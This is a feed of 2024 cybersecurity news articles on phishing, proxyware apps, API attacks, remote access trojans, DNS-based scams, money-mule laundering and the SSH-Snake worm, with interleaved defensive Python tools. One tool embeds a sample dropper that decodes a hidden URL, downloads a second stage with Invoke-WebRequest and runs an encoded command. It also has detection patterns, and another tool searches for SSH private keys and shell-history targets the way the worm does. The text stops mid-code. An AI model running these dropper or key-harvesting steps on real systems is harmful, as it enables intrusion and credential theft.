Cybercriminals – INDIA NEWS (http://www.indiavpn.org)

Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme
http://www.indiavpn.org/2024/04/08/cybercriminals-targeting-latin-america-with-sophisticated-phishing-scheme/
Mon, 08 Apr 2024 09:11:24 +0000

Apr 08, 2024 | Newsroom | Cybersecurity / Malvertising


A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems.

“The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice,” Trustwave SpiderLabs researcher Karla Agregado said.

The email message, the company said, originates from an email address format that uses the domain “temporary[.]link” and has Roundcube Webmail listed as the User-Agent string.

The HTML file contains a link (“facturasmex[.]cloud”) that, when visited from outside the target region, displays an error message saying “this account has been suspended.” When visited from an IP address geolocated to Mexico, it instead loads a CAPTCHA verification page that uses Cloudflare Turnstile.


This step paves the way for a redirect to another domain from where a malicious RAR file is downloaded. The RAR archive comes with a PowerShell script that gathers system metadata as well as checks for the presence of antivirus software in the compromised machine.

It also incorporates several Base64-encoded strings that are designed to run PHP scripts to determine the user’s country and retrieve a ZIP file from Dropbox containing “many highly suspicious files.”
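The PowerShell stage described above lends itself to a quick static triage before anything is detonated: pull out the Base64 blobs, decode them (including the UTF-16LE form that PowerShell's -EncodedCommand expects), and flag the AV-enumeration, reconnaissance and download primitives. The script below is an added example, not code from the campaign or from Trustwave; the sample dropper, its URL, file names and command are constructed placeholders chosen to mirror the traits the article lists.

```python
from __future__ import annotations

import base64
import json
import re

# Constructed stand-in for a dropper with the traits the article describes (system
# metadata collection, AV enumeration, Base64-wrapped strings, a download). It is not
# the campaign's script; the URL, paths and command are placeholders.
_ENCODED_URL = base64.b64encode(b"https://example.invalid/check.php?c=MX").decode()
_ENCODED_CMD = base64.b64encode("Get-Process | Out-Null".encode("utf-16-le")).decode()
SAMPLE_PS1 = rf"""
$os = Get-CimInstance Win32_OperatingSystem
$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
$u  = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("{_ENCODED_URL}"))
Invoke-WebRequest -Uri $u -OutFile $env:TEMP\stage2.zip
powershell -NoProfile -EncodedCommand {_ENCODED_CMD}
"""

# Runs of the Base64 alphabet at least 16 characters long, not glued to a larger token.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}")

# Behavioural indicators: each maps a label to the PowerShell primitives that implement it.
INDICATORS = {
    "av_enumeration": re.compile(r"AntiVirusProduct|SecurityCenter2", re.I),
    "system_recon": re.compile(r"Win32_OperatingSystem|Win32_ComputerSystem|Get-ComputerInfo", re.I),
    "base64_unwrapping": re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I),
    "downloader": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I),
}


def decode_blob(blob: str) -> str | None:
    """Base64-decode a candidate and return it as readable text, or None if it is not text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    # -EncodedCommand payloads are UTF-16LE: every odd byte of ASCII text is 0x00.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16-le", errors="replace")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return text if text and text.isprintable() else None


def triage(script: str) -> dict:
    """Return decoded Base64 strings and the behavioural indicators present in a script."""
    decoded = [d for d in (decode_blob(m.group(0)) for m in B64_RE.finditer(script)) if d]
    indicators = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    if any(d.lower().startswith(("http://", "https://")) for d in decoded):
        indicators.append("hidden_url")  # a URL only visible after decoding
    return {"decoded": decoded, "indicators": indicators}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_PS1), indent=2))
```

Identifiers such as AntiVirusProduct that happen to be valid Base64 are filtered out by the printability check rather than by the regex, which keeps the candidate extraction permissive; the decoded URL is what tells an analyst where the second stage (the Dropbox-hosted ZIP in the article) would come from.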

Trustwave said the campaign exhibits similarities with that of Horabot malware campaigns that have targeted Spanish-speaking users in Latin America in the past.

“Understandably, from the threat actors’ point of view, phishing campaigns always try different [approaches] to hide any malicious activity and avoid immediate detection,” Agregado said.

“Using newly created domains and making them accessible only in specific countries is another evasion technique, especially if the domain behaves differently depending on their target country.”

The development comes as Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users with bogus ads for NordVPN that lead to the distribution of a remote access trojan called SectopRAT (aka ArechClient) hosted on Dropbox via a phony website (“besthord-vpn[.]com”).


“Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads,” security researcher Jérôme Segura said. “Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters.”

It also follows the discovery of a fake Java Access Bridge installer that serves as a conduit to deploy the open-source XMRig cryptocurrency miner, per SonicWall.

The network security company said it also discovered a Golang malware that “uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the [command-and-control server].”

Malicious Apps Caught Secretly Turning Android Phones into Proxies for Cybercriminals
http://www.indiavpn.org/2024/04/01/malicious-apps-caught-secretly-turning-android-phones-into-proxies-for-cybercriminals/
Mon, 01 Apr 2024 10:38:49 +0000

Apr 01, 2024 | Newsroom | Botnet / Mobile Security


Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store.

The findings come from HUMAN’s Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user’s device into a proxy node without their knowledge.

The operation has been codenamed PROXYLIB by the company. The 29 apps in question have since been removed by Google.

Residential proxies are a network of proxy servers sourced from real IP addresses provided by internet service providers (ISPs), helping users hide their actual IP addresses by routing their internet traffic through an intermediary server.

The anonymity benefits aside, they are ripe for abuse by threat actors to not only obfuscate their origins, but also to conduct a wide range of attacks.


“When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor’s infrastructure,” security researchers said. “Many threat actors purchase access to these networks to facilitate their operations.”

Some of these networks can be created by malware operators tricking unsuspecting users into installing bogus apps that essentially corral the devices into a botnet that’s then monetized for profit by selling the access to other customers.

The Android VPN apps discovered by HUMAN are designed to establish contact with a remote server, enroll the infected device to the network, and process any request from the proxy network.

Another notable aspect of these apps is that a subset of them identified between May and October 2023 incorporate a software development kit (SDK) from LumiApps, which contains the proxyware functionality. In both cases, the malicious capability is pulled off using a native Golang library.


LumiApps also offers a service that essentially permits users to upload any APK file of their choice, including legitimate applications, and bundle the SDK to it without having to create a user account, which can then be re-downloaded and shared with others.

“LumiApps helps companies gather information that is publicly available on the internet,” the Israeli company says on its website. “It uses the user’s IP address to load several web pages in the background from well-known websites.”

“This is done in a way that never interrupts the user and fully complies with GDPR/CCPA. The web pages are then sent to companies, who use them to improve their databases, offering better products, services, and pricing.”

These modified apps – called mods – are then distributed in and out of the Google Play Store. LumiApps promotes itself and the SDK as an alternative app monetization method to rendering ads.


There is evidence indicating that the threat actor behind PROXYLIB is selling access to the proxy network created by the infected devices through LumiApps and Asocks, a company that advertises itself as a seller of residential proxies.

What’s more, in an effort to bake the SDK into as many apps as possible and expand the size of the botnet, LumiApps offers cash rewards to developers based on the amount of traffic that gets routed through user devices that have installed their apps. The SDK service is also advertised on social media and black hat forums.

Recent research published by Orange Cyberdefense and Sekoia characterized residential proxies as part of a “fragmented yet interconnected ecosystem,” in which proxyware services are advertised in various ways ranging from voluntary contributions to dedicated shops and reselling channels.


“[In the case of SDKs], the proxyware is often embedded in a product or service,” the companies noted. “Users may not notice that proxyware will be installed when accepting the terms of use of the main application it is embedded with. This lack of transparency leads to users sharing their Internet connection without a clear understanding.”

The development comes as the Lumen Black Lotus Labs disclosed that end-of-life (EoL) small home/small office (SOHO) routers and IoT devices are being compromised by a botnet known as TheMoon to power a criminal proxy service called Faceless.

APIs Drive the Majority of Internet Traffic and Cybercriminals are Taking Advantage
http://www.indiavpn.org/2024/03/19/apis-drive-the-majority-of-internet-traffic-and-cybercriminals-are-taking-advantage/
Tue, 19 Mar 2024 17:08:15 +0000

Mar 19, 2024 | The Hacker News | API Security / Vulnerability

Application programming interfaces (APIs) are the connective tissue behind digital modernization, helping applications and databases exchange data more effectively. The State of API Security in 2024 Report from Imperva, a Thales company, found that the majority of internet traffic (71%) in 2023 was API calls. What’s more, a typical enterprise site saw an average of 1.5 billion API calls in 2023.

The expansive volume of internet traffic that passes through APIs should be concerning for every security professional. Despite best efforts to adopt shift-left frameworks and SDLC processes, APIs are often still pushed into production before they’re cataloged, authenticated, or audited. On average, organizations have 613 API endpoints in production, but that number is rapidly expanding as pressure grows to deliver digital services to customers more quickly and efficiently. Over time, these APIs can become risky, vulnerable endpoints.

In their report, Imperva concludes that APIs are now a common attack vector for cybercriminals because they’re a direct pathway to access sensitive data. As a matter of fact, a study from the Marsh McLennan Cyber Risk Analytics Center finds that API-related security incidents cost global businesses as much as $75 billion annually.

More API Calls, More Problems

Banking and online retail reported the highest volumes of API calls compared to any other industry in 2023. Both industries rely on large API ecosystems to deliver digital services to their customers. Therefore, it’s no surprise that financial services, which include banking, were the leading target of API-related attacks in 2023.

Cybercriminals use a variety of methods to attack API endpoints, but one common attack vector is account takeover (ATO). This attack occurs when cybercriminals exploit weaknesses in an API’s authentication process to gain unauthorized access to accounts. In 2023, nearly half (45.8%) of all ATO attacks targeted API endpoints. These attempts are often carried out by automation in the form of bad bots, software agents that run automated tasks with malicious intent. When successful, these attacks can lock customers out of their accounts, provide criminals with sensitive data, contribute to revenue loss, and increase the risk of non-compliance. Considering the value of the data that banks and other financial institutions manage for their customers, ATO is a concerning business risk.

Why Mismanaged APIs are a Security Threat

Mitigating API security risk is a unique challenge that frustrates even the most sophisticated security teams. The issue stems from the fast pace of software development and the lack of mature tools and processes to help developers and security teams work more collaboratively. As a result, nearly one out of every 10 APIs is vulnerable to attack because it wasn’t deprecated correctly, isn’t monitored, or lacks sufficient authentication controls.

In their report, Imperva identified three common types of mismanaged API endpoints that create security risks for organizations: shadow, deprecated, and unauthenticated APIs.

  • Shadow APIs: Also known as undocumented or undiscovered APIs, these are APIs that are unsupervised, forgotten about, and/or outside of the security team’s visibility. Imperva estimates that shadow APIs make up 4.7% of every organization’s collection of active APIs. These endpoints are introduced for a variety of reasons—from the purpose of software testing to use as a connector to a third-party service. Issues arise when these API endpoints are not cataloged or managed properly. Businesses should be concerned about shadow APIs because they typically have access to sensitive information, but nobody knows where they exist or what they’re connected to. A single shadow API can lead to a compliance violation and regulatory fine, or worse, a motivated cybercriminal will abuse it to access an organization’s sensitive data.
  • Deprecated APIs: Deprecating an API endpoint is a natural progression in the software lifecycle. As a result, the presence of deprecated APIs is not uncommon, as software is updated at a rapid, continuous pace. In fact, Imperva estimates that deprecated APIs, on average, make up 2.6% of an organization’s collection of active APIs. When an endpoint is deprecated, the services that depend on it are updated and a request to the deprecated endpoint should fail. However, if those services are not updated and the endpoint is not removed, it keeps answering requests while no longer receiving patches or updates, and so becomes vulnerable.
  • Unauthenticated APIs: Often, unauthenticated APIs are introduced as a result of misconfiguration, oversight from a rushed release process, or the relaxation of a rigid authentication process to accommodate older versions of software. These APIs make up, on average, 3.4% of an organization’s collection of active APIs. The existence of unauthenticated APIs poses a significant risk to organizations as it can expose sensitive data or functionality to unauthorized users and lead to data breaches or system manipulation.

To mitigate the various security risks introduced by mismanaged APIs, conducting regular audits to identify unmonitored or unauthenticated API endpoints is recommended. Continuous monitoring can help detect any attempts to exploit vulnerabilities associated with these endpoints. In addition, developers should regularly update and upgrade APIs to ensure that deprecated endpoints are replaced with more secure alternatives.
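The three classes above can be found mechanically from two inputs: the catalogue the team believes is in production and the gateway's access log. The script below is an added example, not Imperva's tooling; the catalogue, the log format and the sample lines are constructed, and it treats a 2xx response as proof that an endpoint is live.

```python
import re

# Constructed API catalogue (what the team believes is in production), keyed by path
# template. This is an illustrative stand-in, not a real organisation's inventory.
CATALOG = {
    "/api/v1/users/{id}": {"auth_required": True, "deprecated": False},
    "/api/v1/login": {"auth_required": False, "deprecated": False},
    "/api/v0/users/{id}": {"auth_required": True, "deprecated": True},
}

# Constructed gateway access log: timestamp, method, path, status, credential type.
SAMPLE_LOG = """\
2024-03-19T10:00:01Z GET  /api/v1/users/42        200 bearer
2024-03-19T10:00:02Z POST /api/v1/login           200 none
2024-03-19T10:00:03Z GET  /api/v0/users/7         200 bearer
2024-03-19T10:00:04Z GET  /api/v1/export          200 none
2024-03-19T10:00:05Z GET  /api/v1/users/42        200 none
2024-03-19T10:00:06Z GET  /api/v1/internal/debug  200 none
2024-03-19T10:00:07Z GET  /api/v1/users/99        401 none
"""

_NUMERIC_SEGMENT = re.compile(r"/\d+(?=/|$)")


def normalize(path: str) -> str:
    """Drop the query string and collapse numeric segments to {id} so log paths match templates."""
    return _NUMERIC_SEGMENT.sub("/{id}", path.split("?", 1)[0])


def parse_log(text: str) -> list:
    """Parse the constructed five-column log format into records."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than guess
        ts, method, path, status, cred = parts
        records.append({"ts": ts, "method": method, "path": normalize(path),
                        "status": int(status), "authenticated": cred != "none"})
    return records


def audit(catalog: dict, records: list) -> dict:
    """Classify observed endpoints as shadow, deprecated-but-live or unauthenticated."""
    shadow, shadow_open, deprecated_live, unauthenticated = set(), set(), set(), set()
    for r in records:
        served = 200 <= r["status"] < 300
        entry = catalog.get(r["path"])
        if entry is None:
            shadow.add(r["path"])  # traffic to an endpoint nobody catalogued
            if served and not r["authenticated"]:
                shadow_open.add(r["path"])  # and it answers without credentials
            continue
        if entry["deprecated"] and served:
            deprecated_live.add(r["path"])  # retired on paper, still answering
        if entry["auth_required"] and served and not r["authenticated"]:
            unauthenticated.add(r["path"])  # policy says auth, server said 2xx anyway
    return {"shadow": shadow, "shadow_open": shadow_open,
            "deprecated_live": deprecated_live, "unauthenticated": unauthenticated}


if __name__ == "__main__":
    for kind, paths in audit(CATALOG, parse_log(SAMPLE_LOG)).items():
        print(f"{kind}: {sorted(paths)}")
```

Only successful responses count: the 401 on the last sample line is the API doing its job, whereas the 200 served to an unauthenticated caller on a path the catalogue marks as protected is the finding. Run against a real gateway log, the path normaliser is the piece that needs tuning to the organisation's URL conventions.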

How to Protect Your APIs

Imperva offers several recommendations to help organizations improve their API Security posture:

  1. Discover, classify, and inventory all APIs, endpoints, parameters, and payloads. Use continuous discovery to maintain an always up-to-date API inventory and disclose exposure of sensitive data.
  2. Identify and protect sensitive and high-risk APIs. Perform risk assessments specifically targeting API endpoints vulnerable to Broken Authorization and Authentication as well as Excessive Data Exposure.
  3. Establish a robust monitoring system for API endpoints to detect and analyze suspicious behaviors and access patterns actively.
  4. Adopt an API Security approach that integrates Web Application Firewall (WAF), API Protection, Distributed Denial of Service (DDoS) prevention, and Bot Protection. A comprehensive range of mitigation options offers flexibility and advanced protection against increasingly sophisticated API threats—such as business logic attacks, which are particularly challenging to defend against as they are unique to each API.

This article is a contributed piece from one of our valued partners.
Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub
http://www.indiavpn.org/2024/03/13/cybercriminals-deploying-vcurms-and-strrat-trojans-via-aws-and-github/
Wed, 13 Mar 2024 10:32:29 +0000

Mar 13, 2024 | Newsroom | Phishing Attack / Threat Intelligence


A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.

“The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware,” Fortinet FortiGuard Labs researcher Yurren Wan said.

An unusual aspect of the campaign is VCURMS’ use of a Proton Mail email address (“sacriliage@proton[.]me”) for communicating with a command-and-control (C2) server.

The attack chain commences with a phishing email that urges recipients to click on a button to verify payment information, resulting in the download of a malicious JAR file (“Payment-Advice.jar”) hosted on AWS.


Executing the JAR file leads to the retrieval of two more JAR files, which are then run separately to launch the twin trojans.

Besides sending an email with the message “Hey master, I am online” to the actor-controlled address, VCURMS RAT periodically checks the mailbox for emails with specific subject lines to extract the command to be executed from the body of the missive.

This includes running arbitrary commands using cmd.exe, gathering system information, searching and uploading files of interest, and downloading additional information stealer and keylogger modules from the same AWS endpoint.

The information stealer comes fitted with capabilities to siphon sensitive data from apps like Discord and Steam, credentials, cookies, and auto-fill data from various web browsers, screenshots, and extensive hardware and network information about the compromised hosts.

VCURMS is said to share similarities with another Java-based infostealer codenamed Rude Stealer, which emerged in the wild late last year. STRRAT, on the other hand, has been detected in the wild since at least 2020, often propagated in the form of fraudulent JAR files.


“STRRAT is a RAT built using Java, which has a wide range of capabilities, such as serving as a keylogger and extracting credentials from browsers and applications,” Wan noted.

The disclosure comes as Darktrace revealed a novel phishing campaign that’s taking advantage of automated emails sent from the Dropbox cloud storage service via “no-reply@dropbox[.]com” to propagate a bogus link mimicking the Microsoft 365 login page.

“The email itself contained a link that would lead a user to a PDF file hosted on Dropbox, that was seemingly named after a partner of the organization,” the company said. “The PDF file contained a suspicious link to a domain that had never previously been seen on the customer’s environment, ‘mmv-security[.]top.’”

Cybercriminals Using Novel DNS Hijacking Technique for Investment Scams
http://www.indiavpn.org/2024/03/05/cybercriminals-using-novel-dns-hijacking-technique-for-investment-scams/
Tue, 05 Mar 2024 13:33:55 +0000

Mar 05, 2024 | Newsroom | Cybercrime / Malware


A new DNS threat actor dubbed Savvy Seahorse is leveraging sophisticated techniques to entice targets into fake investment platforms and steal funds.

“Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia,” Infoblox said in a report published last week.

Targets of the campaigns include Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers, indicating that the threat actors are casting a wide net in their attacks.

Users are lured via ads on social media platforms like Facebook, while also tricking them into parting with their personal information in return for alleged high-return investment opportunities through fake ChatGPT and WhatsApp bots.


The financial scam campaigns are notable for using DNS canonical name (CNAME) records to create a traffic distribution system (TDS), thereby allowing threat actors to evade detection since at least August 2021.

A CNAME record maps a domain or subdomain to another domain name (an alias to a canonical name) instead of pointing directly to an IP address. The operational advantage is that when the host’s IP address changes, only the A record of the canonical name needs to be updated; every alias pointing at it follows automatically.

Savvy Seahorse turns this property to its advantage by registering many short-lived subdomains that share the same CNAME target (and therefore resolve to the same IP address). These subdomains are generated with a domain generation algorithm (DGA) and hang off the primary campaign domain.

The ever-changing nature of the domains and IP addresses also makes the infrastructure resistant to takedown efforts, allowing the threat actors to continuously create new domains or alter their CNAME records to a different IP address as their phishing sites are disrupted.
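To make the CNAME mechanics concrete, the added example below (not Infoblox’s code) follows a CNAME chain the way a resolver does, shows that repointing the single A record moves every alias at once, and then applies the hunting heuristic the campaign invites: many aliases with machine-looking leftmost labels all pointing at one canonical name. The records, the domains (all under the reserved .test TLD) and the thresholds are constructed.

```python
import math
from collections import defaultdict

# Constructed passive-DNS style observations: (owner name, type, rdata).
# Names use the reserved .test TLD; nothing here is a real campaign domain.
RECORDS = [
    ("k7f2pq9xz1.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("m3hv8r0ty5.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("a9wb2nc6ld.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("q1ze7ujs4o.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("g5rt0k8pbn.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("x2cv6mwa3y.invest-example.test", "CNAME", "tds.invest-example.test."),
    ("tds.invest-example.test", "A", "203.0.113.10"),
    ("www.shop-example.test", "CNAME", "shop-example.test."),
    ("blog.shop-example.test", "CNAME", "shop-example.test."),
    ("shop-example.test", "A", "198.51.100.5"),
]


def _norm(name: str) -> str:
    """Lower-case and strip the trailing dot so owner names and rdata compare equal."""
    return name.lower().rstrip(".")


def resolve(name: str, records: list, max_hops: int = 8) -> tuple:
    """Follow CNAMEs like a resolver would and return (canonical name, sorted A records).

    Because every alias ends at the canonical name, changing that one A record
    repoints all of them, which is exactly what the TDS relies on."""
    cnames = {_norm(o): _norm(v) for o, t, v in records if t == "CNAME"}
    a_records = defaultdict(list)
    for owner, rtype, value in records:
        if rtype == "A":
            a_records[_norm(owner)].append(value)
    current, seen = _norm(name), set()
    while current in cnames:
        if current in seen or len(seen) >= max_hops:
            raise ValueError(f"CNAME loop or chain too long at {current}")
        seen.add(current)
        current = cnames[current]
    return current, sorted(a_records.get(current, []))


def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a DNS label; DGA labels score high."""
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_cname_clusters(records: list, min_aliases: int = 5, min_entropy: float = 2.5) -> dict:
    """Group CNAME aliases by canonical name; keep targets with many aliases whose
    leftmost labels look machine-generated. Thresholds are illustrative."""
    by_target = defaultdict(set)
    for owner, rtype, value in records:
        if rtype == "CNAME":
            by_target[_norm(value)].add(_norm(owner))
    clusters = {}
    for target, aliases in by_target.items():
        if len(aliases) < min_aliases:
            continue
        mean_entropy = sum(label_entropy(a.split(".")[0]) for a in aliases) / len(aliases)
        if mean_entropy >= min_entropy:
            clusters[target] = sorted(aliases)
    return clusters


if __name__ == "__main__":
    print(resolve("k7f2pq9xz1.invest-example.test", RECORDS))
    for target, aliases in find_cname_clusters(RECORDS).items():
        print(f"{target}: {len(aliases)} DGA-like aliases, e.g. {aliases[0]}")
```

The entropy cut-off separates labels like www or blog (entropy 0 or low) from ten-character random strings (about 3.3 bits per character), and the alias-count floor keeps ordinary sites with a handful of CNAMEs out of the result. In practice a hunter would also weight by the age of the subdomains, since the article stresses that they are short-lived.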

While threat actors like VexTrio have used DNS as a TDS, the discovery marks the first time CNAME records have been used for such purposes.


Victims who end up clicking the links embedded on Facebook ads are urged to provide their names, email addresses, and phone numbers, after which they are redirected to the bogus trading platform for adding funds to their wallets.

“An important detail to note is the actor validates the user’s information to exclude traffic from a predefined list of countries, including Ukraine, India, Fiji, Tonga, Zambia, Afghanistan, and Moldova, although their reasoning for choosing these specific countries is unclear,” Infoblox noted.

The development comes as Guardio Labs revealed that thousands of domains belonging to legitimate brands and institutions have been hijacked using a technique called CNAME takeover to propagate spam campaigns.

How Cybercriminals are Exploiting India’s UPI for Money Laundering Operations
http://www.indiavpn.org/2024/03/04/how-cybercriminals-are-exploiting-indias-upi-for-money-laundering-operations/
Mon, 04 Mar 2024 14:49:33 +0000


Cybercriminals are running a network of hired money mules in India through an Android-based application to orchestrate a massive money laundering scheme.

The malicious application, called XHelper, is a “key tool for onboarding and managing these money mules,” CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report.

Details about the scam first emerged in late October 2023, when Chinese cyber criminals were found to take advantage of the fact that Indian Unified Payments Interface (UPI) service providers operate without coverage under the Prevention of Money Laundering Act (PMLA) to initiate illegal transactions under the guise of offering an instant loan.

The ill-gotten proceeds from the operation are transferred to other accounts belonging to hired mules, who are recruited from Telegram in return for commissions ranging from 1-2% of the total transaction amounts.


“Central to this operation are Chinese payment gateways exploiting the QR code feature of UPI with precision,” the cybersecurity company noted at the time.

“The scheme leveraged a network exceeding hundreds of thousands of compromised ‘money mule’ accounts to funnel illicit funds through fraudulent payment channels, ultimately transferring them back to China.”

These mules are efficiently managed using XHelper, which also facilitates the technology behind fake payment gateways used in pig butchering and other scams. The app is distributed via websites masquerading as legitimate businesses under the guise of “Money Transfer Business.”

The app further offers the capability for mules to track their earnings and streamline the whole process of payouts and collection. This involves an initial setup process where they are asked to register their unique UPI IDs in a particular format and configure online banking credentials.


While payouts mandate the swift transfer of funds to pre-designated accounts within 10 minutes, collection orders are more passive in nature, with the registered accounts receiving incoming funds from other scammers utilizing the platform.

“Money mules activate order intake within the XHelper app, enabling them to receive and fulfill money laundering tasks,” the researchers said. “The system automatically assigns orders, potentially based on predetermined criteria or mule profiles.”

Once an illicit fund transfer is executed using the linked bank account, mules are also expected to upload proof of the transaction in the form of screenshots, which are then validated in exchange for financial rewards, thereby incentivizing continued participation.


XHelper’s features also extend to inviting others to join as agents, who are in charge of recruiting the mules. It manifests as a referral system that allows them to get bonuses for each new recruit, thus driving an ever-expanding network of agents and mules.

“This referral system follows a pyramid-like structure, fueling mass recruitment of both agents and money mules, amplifying the reach of illicit activities,” the researchers said. “Agents, in turn, recruit more mules and invite additional agents, perpetuating the growth of this interconnected network.”

Another of XHelper’s notable functions is to help train mules to efficiently launder stolen funds using a Learning Management System (LMS) that offers tutorials on opening fake corporate bank accounts (which have higher transaction limits), the different workflows, and ways to earn more commission.

Besides favoring the UPI feature built into legitimate banking apps for conducting the transfers, the platform acts as a hub for finding ways to get around account freezes to enable mules to continue their illegal activities. They are also given training to handle customer support calls made by banks for verifying suspicious transactions.


“While XHelper serves as a concerning example, it’s crucial to recognize this isn’t an isolated incident,” CloudSEK said, adding it discovered a “growing ecosystem of similar applications facilitating money laundering across various scams.”

In December 2023, Europol announced that 1,013 individuals were arrested in the second half of 2023 as part of a global effort to tackle money laundering. The international law enforcement operation also led to the identification of 10,759 money mules and 474 recruiters (aka herders).

The disclosure comes as Kaspersky revealed that malware, adware, and riskware attacks on mobile devices rose steadily from February 2023 until the end of the year.

“Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early 2021 levels by the end of the year,” the Russian security vendor noted. “Adware accounted for the majority of threats detected in 2023.”

Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks
http://www.indiavpn.org/2024/02/22/cybercriminals-weaponizing-open-source-ssh-snake-tool-for-network-attacks/
Thu, 22 Feb 2024 12:34:54 +0000

Feb 22, 2024 | Newsroom | Network Security / Penetration Testing


A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities.

“SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network,” Sysdig researcher Miguel Hernández said.

“The worm automatically searches through known credential locations and shell history files to determine its next move.”

SSH-Snake was first released on GitHub in early January 2024, and is described by its developer as a “powerful tool” to carry out automatic network traversal using SSH private keys discovered on systems.

In doing so, it creates a comprehensive map of a network and its dependencies, helping determine the extent to which a network can be compromised using SSH and SSH private keys starting from a particular host. It also supports resolution of domains which have multiple IPv4 addresses.
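A defender can run the same search the worm does on a single host and read the result as that host’s blast radius. The added example below is not SSH-Snake’s code; it walks a home directory for private keys, tells passphrase-protected keys from plaintext ones (legacy PEM via the Proc-Type header, OpenSSH format by reading the cipher name from the key blob), and pulls ssh targets out of .bash_history. The demo home directory it builds is constructed, and its key files carry only a structural header with no key material.

```python
from __future__ import annotations

import base64
import re
import struct
import tempfile
from pathlib import Path

KEY_BEGIN = re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----")
# Simple forms only: "ssh [-i key] [user@]host"; option-first forms like "ssh -p 22 host" are skipped.
SSH_CMD = re.compile(r"\bssh\s+(?:-i\s+(\S+)\s+)?(?:[\w.-]+@)?((?!-)[\w.-]+)")


def openssh_cipher(armored: str) -> str:
    """Read the cipher name from an OpenSSH-format key; 'none' means no passphrase."""
    body = "".join(l for l in armored.splitlines() if not l.startswith("-----"))
    raw = base64.b64decode(body)
    magic = b"openssh-key-v1\x00"
    if not raw.startswith(magic):
        return "unknown"
    off = len(magic)
    (n,) = struct.unpack(">I", raw[off:off + 4])          # length-prefixed cipher name
    return raw[off + 4:off + 4 + n].decode("ascii", "replace")


def key_is_encrypted(text: str) -> bool:
    if "Proc-Type: 4,ENCRYPTED" in text:                   # legacy PEM with passphrase
        return True
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        return openssh_cipher(text) != "none"
    return False                                            # legacy PEM without passphrase


def find_private_keys(root: Path) -> list[Path]:
    """Every small file under root whose contents carry a private-key header, whatever its name."""
    hits = []
    for p in root.rglob("*"):
        if p.is_file() and p.stat().st_size < 65536:
            try:
                text = p.read_text(errors="ignore")
            except OSError:
                continue
            if KEY_BEGIN.search(text):
                hits.append(p)
    return hits


def harvest_history(path: Path) -> list[tuple[str | None, str]]:
    """Pull (identity file, host) pairs out of shell history, as the worm would."""
    if not path.exists():
        return []
    return [(m.group(1), m.group(2)) for m in map(SSH_CMD.search, path.read_text().splitlines()) if m]


def audit(home: Path) -> dict:
    encrypted, plaintext = [], []
    for key in find_private_keys(home):
        rel = key.relative_to(home).as_posix()
        (encrypted if key_is_encrypted(key.read_text(errors="ignore")) else plaintext).append(rel)
    return {"unencrypted_keys": sorted(plaintext), "encrypted_keys": sorted(encrypted),
            "history_targets": harvest_history(home / ".bash_history")}


def _fake_openssh_key(cipher: str) -> str:
    """Structural header of an OpenSSH key with no key material, for the demo only."""
    blob = (b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher.encode()
            + struct.pack(">I", 4) + b"none" + struct.pack(">I", 0))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n"


def build_demo_home() -> Path:
    """Constructed home directory: one plaintext key, two protected keys, some history."""
    home = Path(tempfile.mkdtemp(prefix="sshaudit-"))
    ssh = home / ".ssh"
    ssh.mkdir()
    (ssh / "id_ed25519").write_text(_fake_openssh_key("none"))
    (ssh / "deploy_key").write_text(_fake_openssh_key("aes256-ctr"))
    (ssh / "legacy.pem").write_text("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                                    "DEK-Info: AES-128-CBC,00\nAAAA\n-----END RSA PRIVATE KEY-----\n")
    (home / ".bash_history").write_text("ssh deploy@10.0.0.5\nssh -i ~/.ssh/deploy_key admin@db01.internal\n"
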